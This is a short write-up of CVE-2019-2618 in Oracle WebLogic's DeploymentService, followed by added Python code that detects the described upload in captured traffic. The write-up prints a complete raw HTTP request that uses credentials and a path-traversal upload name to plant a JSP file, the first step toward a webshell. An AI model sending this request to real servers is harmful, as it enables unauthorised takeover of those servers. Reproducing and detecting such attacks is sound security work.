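Vulnerability impact overview:
CVE-2019-2618 mainly abuses the DeploymentService interface in the WebLogic component, which supports uploading arbitrary files to the server. Having got past OAM (Oracle Access Management) authentication, the attacker sets the wl_request_type parameter to app_upload, constructs a POST request in file-upload format, and uploads a JSP webshell file, which can then yield control of the entire server.
Affected versions: WebLogic 10.3.6.0, 12.1.3.0, 12.2.1.3
Vulnerability reproduction: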
POST /bea_wls_deployment_internal/DeploymentService HTTP/1.1
Host: 127.0.0.1:7001
Connection: close
Accept-Encoding: gzip, deflate
Accept: */*
User-Agent: python-requests/2.21.0
username: weblogic
wl_request_type: app_upload
cache-control: no-cache
wl_upload_application_name:/../tmp/_WL_internal/bea_wls_internal/9j4dqk/war
serverName: zhengjim
password: weblogic123
content-type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW
archive: true
server_version: 10.3.6.0
wl_upload_delta: true
Content-Length: 218

------WebKitFormBoundary7MA4YWxkTrZu0gW
Content-Disposition: form-data; name="shell.jsp"; filename="shell.jsp"
Content-Type: false

<%
out.print("123456");
%>
------WebKitFormBoundary7MA4YWxkTrZu0gW--
Collect the path addresses for more WebLogic versions. A successful upload is shown in the figure below!
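For detection, the request above carries several signals that can be checked in proxy or WAF captures. The following is an added example, not part of the original write-up: the names parse_request, findings, DEPLOY_PATH and SCRIPT_EXT are hypothetical, and the sample requests are constructed.

```python
import re

DEPLOY_PATH = "/bea_wls_deployment_internal/DeploymentService"
SCRIPT_EXT = re.compile(r'filename="[^"]*\.jspx?"', re.I)

def parse_request(raw):
    """Split a raw HTTP request into (method, path, headers dict, body)."""
    head, _, body = raw.replace("\r\n", "\n").partition("\n\n")
    lines = head.split("\n")
    method, path = (lines[0].split(" ") + ["", ""])[:2]
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return method, path, headers, body

def findings(raw):
    """Return the reasons a request looks like a DeploymentService file upload."""
    method, path, headers, body = parse_request(raw)
    if method != "POST" or path.split("?")[0] != DEPLOY_PATH:
        return []
    hits = ["POST to DeploymentService"]
    if headers.get("wl_request_type", "").lower() == "app_upload":
        hits.append("wl_request_type=app_upload")
    app_name = headers.get("wl_upload_application_name", "")
    if ".." in app_name.replace("\\", "/").split("/"):
        hits.append("path traversal in wl_upload_application_name")
    if SCRIPT_EXT.search(body):
        hits.append("JSP file in multipart body")
    return hits

# Constructed sample, trimmed from the request shown above.
SUSPICIOUS = "\n".join([
    "POST /bea_wls_deployment_internal/DeploymentService HTTP/1.1",
    "wl_request_type: app_upload",
    "wl_upload_application_name:/../tmp/_WL_internal/bea_wls_internal/9j4dqk/war",
    "content-type: multipart/form-data; boundary=----WebKitFormBoundary7MA4YWxkTrZu0gW",
    "",
    "------WebKitFormBoundary7MA4YWxkTrZu0gW",
    'Content-Disposition: form-data; name="shell.jsp"; filename="shell.jsp"',
    "",
    "------WebKitFormBoundary7MA4YWxkTrZu0gW--",
])
# Constructed sample of unrelated traffic to the same server.
BENIGN = "GET /console/login/LoginForm.jsp HTTP/1.1\nHost: 127.0.0.1:7001\n\n"

if __name__ == "__main__":
    for name, raw in (("suspicious", SUSPICIOUS), ("benign", BENIGN)):
        print(name, findings(raw))
```

A request that returns only the first one or two findings may be a normal deployment; the traversal and JSP findings are the ones that match the upload described on this page.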